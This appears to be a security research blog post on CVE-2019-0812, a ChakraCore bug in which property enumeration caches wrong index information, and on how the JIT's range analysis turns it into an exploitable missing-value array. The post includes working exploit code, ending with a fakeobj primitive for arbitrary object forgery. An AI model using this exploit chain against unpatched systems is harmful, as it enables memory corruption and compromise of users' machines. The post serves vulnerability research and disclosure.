Today we have our first blog post about CVE-2019-0812 with an honored guest and friend: S0rryMyBad. There has traditionally not been much collaboration between the Chinese researcher community and other researchers. However, since we are both addicted to ChakraCore, we have been able to exchange ideas over the last few months, and we are happy to present this jointly written blog post today. We hope this can lead to even more collaboration in the future!

The bug

As in other engines, JavaScript objects in Chakra do not maintain their own map of property names to property values. Internally, each object is represented as a DynamicObject that only stores the property values and has a field called type, which points to a Type object that maps a property name to an index into the property values array.
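
To make this layout concrete, here is a minimal toy model in plain JavaScript. ToyType and ToyObject are hypothetical names we made up for illustration; they are not Chakra classes and leave out everything except the name-to-index mapping described above.

```javascript
// Toy model only: ToyType and ToyObject are hypothetical, not Chakra classes.
class ToyType {
    constructor(propertyNames) {
        // Maps a property name to its index in the owning object's slot array.
        this.indexOf = new Map(propertyNames.map((name, i) => [name, i]));
    }
}

class ToyObject {
    constructor(type, slots) {
        this.type = type;   // shared description of the layout
        this.slots = slots; // property values only, no names
    }

    get(name) {
        const index = this.type.indexOf.get(name);
        return index === undefined ? undefined : this.slots[index];
    }
}

// Two objects with the same layout share one type and differ only in their slots.
const pointType = new ToyType(["x", "y"]);
const first = new ToyObject(pointType, [1, 2]);
const second = new ToyObject(pointType, [10, 20]);

console.log(first.get("y"), second.get("x")); // 2 10
```

The point of the split is that the name lookup lives in the shared type, so anything that remembers an index is only valid for the type it was computed from.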

In Chakra, JavaScript code is initially run through an interpreter before eventually being scheduled for JIT compilation if a function gets called repeatedly. In order to speed up execution in the interpreter, certain operations like property reads and writes can be cached to avoid type lookups every time a given property is accessed. Essentially, these Cache objects associate a property name (internally a PropertyId) with an index used to read or write the property.

One of the operations that can lead to the use of such caches is property enumeration via for .. in loops. Property enumeration will eventually reach the following code inside the type handler (which is part of the object Type) for the object being enumerated:

template<size_t size>
BOOL SimpleTypeHandler<size>::FindNextProperty(ScriptContext* scriptContext, PropertyIndex& index, JavascriptString** propertyStringName,
    PropertyId* propertyId, PropertyAttributes* attributes, Type* type, DynamicType *typeToEnumerate, EnumeratorFlags flags, DynamicObject* instance, PropertyValueInfo* info)
{
    Assert(propertyStringName);
    Assert(propertyId);
    Assert(type);

    for( ; index < propertyCount; ++index )
    {
        PropertyAttributes attribs = descriptors[index].Attributes;
        if( !(attribs & PropertyDeleted) && (!!(flags & EnumeratorFlags::EnumNonEnumerable) || (attribs & PropertyEnumerable)))
        {
            const PropertyRecord* propertyRecord = descriptors[index].Id;

            // Skip this property if it is a symbol and we are not including symbol properties
            if (!(flags & EnumeratorFlags::EnumSymbols) && propertyRecord->IsSymbol())
            {
                continue;
            }

            if (attributes != nullptr)
            {
                *attributes = attribs;
            }

            *propertyId = propertyRecord->GetPropertyId();
            PropertyString * propStr = scriptContext->GetPropertyString(*propertyId);
            *propertyStringName = propStr;

            PropertyValueInfo::SetCacheInfo(info, propStr, propStr->GetLdElemInlineCache(), false);
            if ((attribs & PropertyWritable) == PropertyWritable)
            {
                PropertyValueInfo::Set(info, instance, index, attribs); // [[ 1 ]]
            }
            else
            {
                PropertyValueInfo::SetNoCache(info, instance);
            }
            return TRUE;
        }
    }
    PropertyValueInfo::SetNoCache(info, instance);

    return FALSE;
}

There are two interesting things to note. First, at [[ 1 ]], the PropertyValueInfo is updated with the associated instance, index and attribs. Second, this method is called with two Type objects: type and typeToEnumerate.

The PropertyValueInfo is then later used to create a Cache for that property in void CacheOperators::CachePropertyRead.

The peculiar thing to realize here is that in the FindNextProperty code, even though two Type objects are passed as parameters, the PropertyValueInfo object is updated in any case. What if those two types were different? Would that mean that the cache information would be updated for a wrong type?

It turns out that this is exactly what happens and the following PoC illustrates the behaviour:

function poc(v) {
	var tmp = new String("aa");
	tmp.x = 2;
	once = 1;
	for (let useless in tmp) {
		if (once) {
			delete tmp.x;
			once = 0;
		}
		tmp.y = v;
		tmp.x = 1;
	}
	return tmp.x;
}

console.log(poc(5));

Looking at this code, you would expect it to print 1, but it prints 5 instead. So it seems that executing return tmp.x actually fetches the value of property tmp.y.

This is consistent with the behaviour we expect from our analysis of the FindNextProperty code: when we delete tmp.x and then set tmp.y and tmp.x, we end up with tmp.y at index 0 and tmp.x at index 1 in our object. However, in the initial type being enumerated, tmp.x is at index 0. So the cache info for the new type will be updated to say that tmp.x is at index 0, and executing return tmp.x will do a direct access at that index.
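
The mismatch can be reproduced with a small toy model. This is only a sketch of the idea under our own simplifications: layouts are plain arrays of names, and cachedRead is a hypothetical helper, not Chakra's cache implementation.

```javascript
// Toy model of the faulty caching; none of these names exist in Chakra.
const enumeratedLayout = ["x"];   // layout the for..in loop is still walking
const currentLayout = ["y", "x"]; // layout after: delete tmp.x; tmp.y = 5; tmp.x = 1
const slots = [5, 1];             // values stored under currentLayout

// Buggy step: the index is taken from the enumerated layout,
// but it is recorded against the object's current layout.
const cache = {
    layout: currentLayout,
    index: enumeratedLayout.indexOf("x"),
};

function cachedRead(objectLayout, objectSlots, cache, name) {
    if (objectLayout === cache.layout) {
        return objectSlots[cache.index];            // fast path trusts the cache
    }
    return objectSlots[objectLayout.indexOf(name)]; // slow path does a real lookup
}

const viaCache = cachedRead(currentLayout, slots, cache, "x");
const viaLookup = slots[currentLayout.indexOf("x")];

console.log(viaCache, viaLookup); // 5 1
```

The type check passes because the cache was tagged with the current layout, so the stale index 0 is used and the read returns the value that really belongs to y.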

To exploit this non-JIT bug, as the title implies, we will actually use the JIT compiler to assist us. We first need to introduce a few concepts for this to make sense. This approach was S0rryMyBad’s idea, so all the props go to him.

Prerequisites

Inline Caching in JIT code

In a nutshell, to optimize property access, the JIT code can rely on Cache objects to generate a Type check sequence followed by a direct property access if the type matches. This essentially corresponds to the following sequence of instructions:

type = object.type
cachedType = Cache.cachedType
if type == cachedType:
    index = Cache.propertyIndex
    property = object.properties[index]
else:
    property = Runtime::GetProperty(object, propertyName)

Type Inference and range analysis in the JIT compiler

In its highest tier, Chakra’s JIT compiler uses a forward pass algorithm to perform optimizations. This algorithm works on a control flow graph (CFG) and visits each block in forward direction. As the first step of processing a new block, the information gathered at each of its predecessors is merged.

One such piece of information is the type and the range of variables. Let’s highlight this behavior using the following example:

function opt(flag) {
    let tmp = {};
    tmp.x = 1;
    if (flag) {
        tmp.x = 2;
    }
    
    ...
}

This roughly corresponds to the following CFG:

function opt(flag) {
    // Block 1
    let tmp = {};
    tmp.x = 1;
    if (flag) {
    // End of Block 1, Successors 2, 3

        // Block 2: Predecessor 1    
        tmp.x = 2;
        // End of Block 2: Successor 3
    
    }

    // Block 3: Predecessors 1, 2
}

When the JIT starts to process block 3, it will merge the type information from block 1, which specifies that tmp.x is of type integer in the range [1,1], with the type information from block 2, specifying that tmp.x is of type integer in the range [2,2].

The union of these types is integer in the range [1,2] and will be assigned to the tmp.x value at the beginning of block 3.
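
As a rough illustration of that merge step, the sketch below computes the range that covers everything arriving from the predecessors. mergeRanges is a hypothetical helper of ours; the real analysis tracks far more than a min/max pair.

```javascript
// Hypothetical helper: merges the integer ranges reaching a block from its predecessors.
function mergeRanges(ranges) {
    return {
        min: Math.min(...ranges.map(r => r.min)),
        max: Math.max(...ranges.map(r => r.max)),
    };
}

const fromBlock1 = { min: 1, max: 1 }; // tmp.x = 1
const fromBlock2 = { min: 2, max: 2 }; // tmp.x = 2

// Range assumed for tmp.x at the start of block 3.
const atBlock3 = mergeRanges([fromBlock1, fromBlock2]);
console.log(atBlock3.min, atBlock3.max); // 1 2
```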

Arrays in Chakra

Arrays are often the target of heavy optimizations – see our last blog post about a bug in JavaScriptCore due to this. In Chakra, most arrays have one of three different storage modes:

  • NativeIntArray: Each element is stored as an unboxed 4-byte integer.
  • NativeFloatArray: Each element is stored as an unboxed 8-byte floating point number.
  • JavascriptArray: Each element is stored in its default, boxed representation (1 is stored as 0x0001000000000001).

On top of this storage mode, the object will carry information about the array that can help for further optimizations. An infamous one is the HasNoMissingValues flag which indicates that every value between index 0 and length - 1 is set.

Missing values are magic values that are defined in RuntimeCommon.h as follows:

    const uint64 VarMissingItemPattern = 0x00040002FFF80002;
    const uint64 FloatMissingItemPattern = 0xFFF80002FFF80002;
    const int32 IntMissingItemPattern = 0xFFF80002;
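
It helps to see what these patterns look like from script. The short check below only uses standard typed arrays; the variable names are ours.

```javascript
const IntMissingItemPattern = 0xFFF80002;

// `| 0` reinterprets the bit pattern as a signed 32-bit integer,
// which is how a NativeIntArray element is seen from JavaScript.
const asInt32 = IntMissingItemPattern | 0;
console.log(asInt32); // -524286

// `>>> 0` goes back to the unsigned view of the same 32 bits.
console.log((asInt32 >>> 0).toString(16)); // fff80002

// FloatMissingItemPattern has the same 32-bit half twice, so byte order
// does not matter when we assemble it from two Uint32 values.
const buffer = new ArrayBuffer(8);
const words = new Uint32Array(buffer);
const doubles = new Float64Array(buffer);
words[0] = 0xFFF80002;
words[1] = 0xFFF80002;

// The resulting double is a NaN with a specific payload.
console.log(Number.isNaN(doubles[0])); // true
```

So the integer pattern is an ordinary int32 value, -524286, that script code can compute, which is why the JIT has to guard stores that might produce it.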

If you are able to create an array with a missing value and the HasNoMissingValues flag set, it is game over since readily available exploit techniques can be used from this point on.

BailOutConventionalNativeArrayAccessOnly

When optimizing an array store operation, the JIT will use type information to check if this store might produce a missing value. If the JIT cannot be sure that this won’t be the case, it will generate a missing value check with a bailout instruction.

These operations are represented by the StElem family of IR instructions and the above-mentioned decision will be made in the GlobOpt::TypeSpecializeStElem(IR::Instr ** pInstr, Value *src1Val, Value **pDstVal) method in GlobOpt.cpp. The code of this method is too big to include but the main logic is the following:

bool bConvertToBailoutInstr = true;
// Definite StElemC doesn't need bailout, because it can't fail or cause conversion.
if (instr->m_opcode == Js::OpCode::StElemC && baseValueType.IsObject())
{
    if (baseValueType.HasIntElements())
    {
        //Native int array requires a missing element check & bailout
        int32 min = INT32_MIN;
        int32 max = INT32_MAX;

        if (src1Val->GetValueInfo()->GetIntValMinMax(&min, &max, false)) // [[ 1 ]]
        {
            bConvertToBailoutInstr = ((min <= Js::JavascriptNativeIntArray::MissingItem) && (max >= Js::JavascriptNativeIntArray::MissingItem)); // [[ 2 ]]
        }
    }
    else
    {
        bConvertToBailoutInstr = false;
    }
}

We can see that it fetches the lower and upper bounds of the valueInfo at [[ 1 ]]. At [[ 2 ]], it keeps the bailout only if the missing item value lies within that range; otherwise the bailout is removed (bConvertToBailoutInstr == false).
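
The range test at [[ 2 ]] is simple enough to restate in JavaScript. This is a toy port of that single comparison, with a function name of our choosing; it is not the engine's code and ignores the surrounding opcode and type checks.

```javascript
const MISSING_ITEM = 0xFFF80002 | 0; // IntMissingItemPattern as a signed int32

// Toy port of the comparison at [[ 2 ]]: true means the bailout is kept.
function needsMissingValueBailout(min, max) {
    return min <= MISSING_ITEM && max >= MISSING_ITEM;
}

// Unknown value: the full int32 range contains the missing item.
console.log(needsMissingValueBailout(-2147483648, 2147483647)); // true

// A small non-negative range can never produce the missing item.
console.log(needsMissingValueBailout(0, 100)); // false
```

Whether the check is emitted therefore depends entirely on how tight, and how trustworthy, the inferred range is.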

Chaining it together

We can use what we learned to create an array with a missing value that the engine is unaware of. To achieve this, we use our bug to generate a Cache with wrong information about the location of a certain property of an object. This in turn leads to wrong results of the type inference and range analysis performed by the JIT. We can thus allocate an array which the JIT infers cannot contain a missing value. It will therefore not generate the bailout, which we can abuse. The following piece of code illustrates this:

function opt(index) {
	var tmp = new String("aa");
	tmp.x = 2;
	once = 1;
	for (let useless in tmp) {
		if (once) {
			delete tmp.x;
			once = 0;
		}
		tmp.y = index;
		tmp.x = 1;
	}
	return [1, tmp.x - 524286]; // forge missing value 0xfff80002 [[ 1 ]]
}

for (let i = 0; i < 0x1000; i++) {
	opt(1);
}

evil = opt(0);
evil[0] = 1.1;

What happens in the above code is that the JIT assumes tmp.x to be in the range [1, 2] at [[ 1 ]]. It will then optimize the array creation to omit the bailout check we wrote about, since it infers that neither 1 - 524286 nor 2 - 524286 is a missing value. However, because of our bug, the read of tmp.x actually returns the value stored in tmp.y, which is 0 in the final call opt(0). Therefore tmp.x - 524286 will be 0xfff80002, which is IntMissingItemPattern. We then simply store a float to convert this array to a NativeFloatArray.
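
The arithmetic is easy to verify outside the engine. The snippet below only redoes the subtraction for the values the JIT expects and for the value the bug actually delivers; the variable names are ours.

```javascript
const OFFSET = 524286;
const MISSING_ITEM = 0xFFF80002 | 0; // IntMissingItemPattern as a signed int32

// Values the JIT believes the second array element can take (tmp.x in [1, 2]).
const inferred = [1, 2].map(x => x - OFFSET);
console.log(inferred); // [ -524285, -524284 ]
console.log(inferred.includes(MISSING_ITEM)); // false

// Value produced at runtime when the stale cache makes tmp.x read 0.
const actual = 0 - OFFSET;
console.log(actual === MISSING_ITEM); // true
console.log((actual >>> 0).toString(16)); // fff80002
```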

The code below shows how easy it is to derive a fakeobj primitive from here:

var convert = new ArrayBuffer(0x100);
var u32 = new Uint32Array(convert);
var f64 = new Float64Array(convert);
var BASE = 0x100000000;

function hex(x) {
    return `0x${x.toString(16)}`
}

function i2f(x) {
    u32[0] = x % BASE;
    u32[1] = (x - (x % BASE)) / BASE;
    return f64[0];
}

function f2i(x) {
    f64[0] = x;
    return u32[0] + BASE * u32[1];
}

// The bug lets us update the CacheInfo for a wrong type so we can create a faulty inline cache.
// We use that to confuse the JIT into thinking that the ValueInfo for tmp.x is either 1 or 2
// when in reality our bug will let us write to tmp.x through tmp.y.
// We can use that to forge a missing value array with the HasNoMissingValues flag
function opt(index) {
	var tmp = new String("aa");
	tmp.x = 2;
	once = 1;
	for (let useless in tmp) {
		if (once) {
			delete tmp.x;
			once = 0;
		}
		tmp.y = index;
		tmp.x = 1;
	}
	return [1, tmp.x - 524286]; // forge missing value 0xfff80002
}

for (let i = 0; i < 0x1000; i++) {
	opt(1);
}

evil = opt(0);
evil[0] = 1.1;
// evil is now a NativeFloatArray with a missing value but the engine does not know it 


function fakeobj(addr) {
    function opt2(victim, magic_arr, hax, addr){
        let magic = magic_arr[1];
        victim[0] = 1.1;
        hax[0x100] = magic;   // change float Array to Var Array
        victim[0] = addr;   // Store unboxed double to Var Array
    }

    for (let i = 0; i < 10000; i++){
        let ary = [2,3,4,5,6.6,7,8,9];
        delete ary[1];
        opt2(ary, [1.1,2.2], ary, 1.1);
    }

    let victim = [1.1,2.2];

    opt2(victim, evil, victim, i2f(addr));
    return victim[0];
}
print(fakeobj(0x12345670));

Conclusion

The fix was published in the April servicing update in the following commit. As we saw, even though the bug was in the interpreter, JIT compilers give a level of freedom that can in some cases be used to abuse otherwise hard-to-exploit non-JIT bugs. We hope you enjoyed our blog post. 谢谢 (thank you) :).